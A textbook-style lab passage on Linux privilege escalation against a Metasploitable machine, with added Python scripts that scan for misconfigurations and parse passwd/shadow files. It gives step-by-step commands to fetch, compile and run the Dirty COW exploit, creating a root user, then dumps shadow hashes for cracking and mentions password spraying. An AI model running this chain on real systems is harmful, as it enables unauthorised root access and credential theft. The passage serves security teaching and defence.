Ethical.Hacking.2021.10:PIVOTING AND PRIVILEGE ESCALATION(2)Extracting Password Hashes on Linux

Linux doesn’t store plaintext passwords. Instead, it stores a salted password hash, produced by the crypt(3) family of functions, in the file /etc/shadow. The prefix of the hash field identifies the algorithm: $1$ is MD5-crypt (what the Metasploitable shadow file shown later in this section uses), $5$ is SHA-256-crypt, $6$ is SHA-512-crypt and $y$ is yescrypt on current distributions.

The permissions on the /etc/shadow file (typically -rw-r----- root shadow) indicate that only the owner (root) and the group (shadow) can read the file, and that only root can write to it. /etc/passwd, by contrast, is world-readable and normally carries an x in its password field to say “look in /etc/shadow”.

The unix-privesc-check script is preinstalled on Kali Linux and checks a system for misconfigurations (world-writable files, setuid binaries, weak permissions on credential files, and so on) that might allow a privilege escalation attack:

unix-privesc-check standard
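As an added example (not the book's code and not unix-privesc-check's own implementation), the script below re-implements three of the findings unix-privesc-check reports: world-writable regular files, setuid/setgid executables, and credential files the current user can write. It is read-only and takes a root directory as a parameter, so it can be pointed at "/" on a target or at the constructed demo tree built by build_demo_tree(); the function names are hypothetical.

```python
import os
import stat
import sys
import tempfile

# Added example (not the book's or unix-privesc-check's own code): a read-only
# re-implementation of three findings unix-privesc-check reports. Nothing here
# modifies the system being checked. Function names are hypothetical.

PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")   # modes here are not a real privesc surface


def privesc_surface(root="/"):
    """Walk `root` and return a dict of sorted path lists:
      world_writable : regular files any user may modify (e.g. a script root runs)
      setuid_setgid  : executables that run with their owner's/group's privileges
      writable_cred  : etc/passwd or etc/shadow under `root` that we can write,
                       the end state the Dirty COW /etc/passwd method creates
    """
    findings = {"world_writable": [], "setuid_setgid": [], "writable_cred": []}
    for dirpath, dirnames, filenames in os.walk(root):
        # prune pseudo-filesystems in place so os.walk does not descend into them
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # vanished or unreadable: skip rather than abort the scan
            if not stat.S_ISREG(mode):
                continue  # symlinks, sockets, devices are not in scope
            if mode & stat.S_IWOTH:
                findings["world_writable"].append(path)
            if mode & (stat.S_ISUID | stat.S_ISGID) and mode & stat.S_IXUSR:
                findings["setuid_setgid"].append(path)
    for rel in ("etc/passwd", "etc/shadow"):
        cred = os.path.join(root, rel)
        if os.path.isfile(cred) and os.access(cred, os.W_OK):
            findings["writable_cred"].append(cred)
    for key in findings:
        findings[key].sort()
    return findings


def build_demo_tree():
    """Constructed sample input: a throwaway tree with one finding of each kind."""
    root = tempfile.mkdtemp(prefix="privesc-demo-")
    os.makedirs(os.path.join(root, "etc"))
    os.makedirs(os.path.join(root, "usr", "bin"))
    passwd = os.path.join(root, "etc", "passwd")
    with open(passwd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    os.chmod(passwd, 0o666)                 # world-writable and a writable credential file
    suid = os.path.join(root, "usr", "bin", "suidprog")
    open(suid, "w").close()
    os.chmod(suid, 0o4755)                  # setuid executable
    normal = os.path.join(root, "usr", "bin", "normal")
    open(normal, "w").close()
    os.chmod(normal, 0o755)                 # ordinary executable: must not be reported
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree()
    for kind, paths in privesc_surface(target).items():
        for p in paths:
            print(kind, p)
```

Run it with no arguments to see the three findings on the demo tree, or with / as the argument on a target to get the same classes of findings unix-privesc-check prints (a real scan of / as an unprivileged user will skip the directories it cannot read).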

The Meterpreter shell has related functionality built in. The command getsystem searches for and exploits possible privilege escalation vulnerabilities, but note that it only implements Windows techniques (named-pipe impersonation and token duplication); on a Linux session, use the post/multi/recon/local_exploit_suggester module instead, which matches the target’s kernel and software against Metasploit’s local exploits:

meterpreter > getsystem

After you gain root privileges, run the Meterpreter module hashdump to extract the hashes from the system. run hashdump is the legacy Windows script; on a Linux session, the equivalent is the post/linux/gather/hashdump module, which reads /etc/passwd and /etc/shadow and prints the combined user:hash lines.

meterpreter > run hashdump

Example: Performing a Dirty COW Privilege Escalation Attack

The Metasploitable kernel is affected by a kernel-level vulnerability nicknamed Dirty COW. The vulnerability (CVE-2016-5195) is a race condition in how the Linux kernel handles copy-on-write for private memory mappings; it allows an attacker without root privileges to write to files they can only read, such as /etc/passwd or a setuid binary, which is enough to take over the system.

First, run uname -a to get the current kernel version of the target:

msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
i686 GNU/Linux

When you have the server’s Linux version, use searchsploit to
search for known vulnerabilities affecting that version:

kali@kali:~$ searchsploit Linux Kernel 2.6.24
------------------------------------------------ -----------------------
Exploit Title | Path
------------------------------------------------ -----------------------
Linux Kernel (Solaris 10 / < 5.10 138888-01) - | solaris/local/15962.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc | linux/local/9844.py
...
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/se | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_P | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE | linux/local/40839.c

Some exploits are more reliable than others. The Dirty COW
PTRACE_POKEDATA exploit works reliably on the Linux version running on the
Metasploitable server.
The code for the exploit is available on your Kali Linux virtual
machine. Using searchsploit, supply the exploit ID 40839 with
the -p option to print the path to the exploit code:

kali@kali:~$ searchsploit -p 40839
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race
Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40839
Path: /usr/share/exploitdb/exploits/linux/local/40839.c
File Type: C source, ASCII text, with CRLF line terminators

Copy the exploit source onto the Metasploitable machine with scp (the target’s address is 192.168.1.101 here):

kali@kali:~/$ scp /usr/share/exploitdb/exploits/linux/local/40839.c msfadmin@192.168.1.101:~/

Compile the exploit on the target. The flags match the build line in the header of 40839.c: -pthread for the racing threads and -lcrypt for the crypt() call that hashes the new user’s password:

msfadmin@metasploitable:~$ gcc -pthread 40839.c -o kernelexploit -lcrypt

Now run the exploit (kernelexploit). It first backs up /etc/passwd to /tmp/passwd.bak, then prompts you for a password for the new root-level user it adds (firefart). I’ve chosen 147 here:

msfadmin@metasploitable:~$ ./kernelexploit
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 147
Complete line:
firefart:fibyOYsv7UnQ6:0:0:pwned:/root:/bin/bash
mmap: b7fa7000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '147'.

Note that the exploit overwrites the existing root line at the top of /etc/passwd with the firefart line rather than appending it, so restore /etc/passwd from /tmp/passwd.bak when you are done. Switch to the newly created user with root privileges:

msfadmin@metasploitable:~$ su firefart
Password:

Now you should be able to read the /etc/shadow file containing
the password hashes:

firefart@metasploitable:/home/msfadmin# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
...

Each entry has the form user:hash:lastchange:min:max:warn:inactive:expire:. The hash field uses the crypt(3) format $id$salt$hash; the $1$ prefix seen here means MD5-crypt, and a * or ! in that field means the account is locked and has nothing to crack. You can crack these hashes using the tools introduced
in Chapter 12.
If you succeed, you’ll have escalated your privileges
and extracted the plaintext passwords for the system’s users.
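As an added example (not the book's code), the script below analyses /etc/passwd and /etc/shadow lines of the kind recovered above: it classifies each shadow hash by its crypt(3) identifier, separates crackable entries from locked ones, converts the last-change day count into a date, and on the passwd side flags exactly what the Dirty COW /etc/passwd method leaves behind (a second UID-0 account and an inline hash that sidesteps /etc/shadow). The sample files are constructed from the Metasploitable output shown above plus the firefart line the exploit writes; the daemon and msfadmin passwd lines are illustrative, and the function names are hypothetical.

```python
from datetime import date, timedelta

# Added example, not the book's code. Sample files are constructed from the
# Metasploitable output shown above plus the line the Dirty COW exploit writes;
# the daemon/msfadmin passwd lines are illustrative, not copied from a real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
firefart:fibyOYsv7UnQ6:0:0:pwned:/root:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
"""

# crypt(3) identifiers: the $1$ entries above are MD5-crypt
CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}


def hash_algorithm(field):
    """Classify a password field the way a cracker does before picking a mode."""
    if field == "":
        return "empty"       # no password required at all
    if field[0] in "*!":
        return "locked"      # no input can match; nothing to crack
    if field.startswith("$"):
        ident = field.split("$")[1]
        return CRYPT_IDS.get(ident, "unknown-crypt-id-" + ident)
    if len(field) == 13:
        return "descrypt"    # traditional DES crypt: 2-char salt + 11 chars
    return "unknown"


def parse_passwd(text):
    """Return one dict per well-formed 7-field /etc/passwd line."""
    users = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) == 7 and not line.startswith("#"):
            users.append({"name": f[0], "pw": f[1], "uid": int(f[2]),
                          "gid": int(f[3]), "home": f[5], "shell": f[6]})
    return users


def parse_shadow(text):
    """Return one dict per 9-field /etc/shadow line; field 3 is days since 1970-01-01."""
    entries = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 9:
            continue
        changed = date(1970, 1, 1) + timedelta(days=int(f[2])) if f[2] else None
        entries.append({"name": f[0], "hash": f[1], "last_change": changed,
                        "algorithm": hash_algorithm(f[1])})
    return entries


def suspicious_passwd_entries(users):
    """Findings that indicate tampering such as the Dirty COW /etc/passwd method."""
    out = []
    for u in users:
        if u["uid"] == 0 and u["name"] != "root":
            out.append((u["name"], "uid 0 account other than root"))
        if u["pw"] == "":
            out.append((u["name"], "empty password field, no password needed"))
        elif u["pw"] not in ("x", "*", "!"):
            # a hash placed directly in the world-readable passwd file is honoured
            # for login and sidesteps the root-only permissions on /etc/shadow
            out.append((u["name"], "inline %s hash in /etc/passwd" % hash_algorithm(u["pw"])))
    return out


def crackable(entries):
    """user:hash lines in the form John the Ripper and hashcat consume."""
    return ["%s:%s" % (e["name"], e["hash"]) for e in entries
            if e["algorithm"] not in ("locked", "empty")]


if __name__ == "__main__":
    for who, why in suspicious_passwd_entries(parse_passwd(SAMPLE_PASSWD)):
        print("passwd  %-10s %s" % (who, why))
    for e in parse_shadow(SAMPLE_SHADOW):
        print("shadow  %-10s %-12s last changed %s" % (e["name"], e["algorithm"], e["last_change"]))
    print("\n".join(crackable(parse_shadow(SAMPLE_SHADOW))))
```

The same checks work from the defender's side: a UID-0 account other than root, or any passwd entry whose password field is not x, is a strong sign that something wrote /etc/passwd directly, which is what this exploit does.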

Tools like spray allow you to test multiple passwords against multiple connections simultaneously (password spraying). However, these tools generate bursts of failed logins that can trigger account lockouts and security alerts, so you’ll want to be careful when using them.
